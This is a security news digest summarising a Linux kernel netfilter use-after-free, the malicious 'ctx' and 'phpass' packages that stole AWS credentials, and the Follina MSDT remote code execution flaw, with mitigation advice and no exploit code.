In this week’s security digest, we’ll discuss various issues and vulnerabilities discovered in open source projects and Windows.
Linux Kernel use-after-free in netfilter subsystem
A use-after-free write vulnerability was identified within the Linux kernel netfilter subsystem. Triggering this issue requires the privilege to create user/net namespaces on the system, and this vulnerability can be exploited to achieve privilege escalation to root on the affected systems.
This weakness is related to the failure to remove an expression from a set’s bindings list before destroying the expression. It was found that this affects multiple expressions, but at the minimum the “lookup” and “dynset” expressions.
This action creates a state where any subsequent use of the set binding list will end up writing a link pointer address into a slab object that has already been freed and possibly reallocated. For more in-depth details about this vulnerability, you can refer to the original disclosure by the researcher. The patch to mitigate the vulnerability was committed on May 26, 2022.
Software supply chain attack using “ctx” and “phpass”
Two malicious Python and PHP packages have been uncovered carrying out a software supply chain attack targeting the open source ecosystem. One of the packages is “ctx,” a Python module available in the PyPi repository. The other involves “phpass,” a PHP package that’s been forked on GitHub to distribute a rogue update.
A malicious update was introduced in “ctx” on May 21, 2022. Both packages are unmaintained with the last legitimate update for “ctx” being released on December 19, 2014 and in the case of “phpass”, on August 31, 2012. At its core, the modifications are designed to exfiltrate AWS credentials to a Heroku URL and it appears that the perpetrator is trying to obtain all the environment variables, encode them in Base64, and forward the data to a web app under the perpetrator’s control.
The responsible individual was able to hijack the maintainer’s abandoned PyPi account by purchasing his expired domain and sending himself a password reset link.
Follina – RCE vulnerability in Microsoft Support Diagnostic Tool (MSDT) in Windows
A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. This malicious document uses the Word remote template feature to retrieve a HTML file from a remote web server, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell. CVE-2022-30190 a zero day allowing code execution in Office products.
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
Microsoft says the flaw impacts all Windows versions still receiving security updates (Windows 7+ and Server 2008+). According to the vendor, admins and users can block attacks exploiting CVE-2022-30190 by disabling the MSDT URL protocol, which malicious actors use to launch troubleshooters and execute code on vulnerable systems. Refer Microsoft’s security guidance to disable the MSDT URL protocol on a Windows device. After Microsoft releases a patch, you can undo the workaround and apply recommended patches.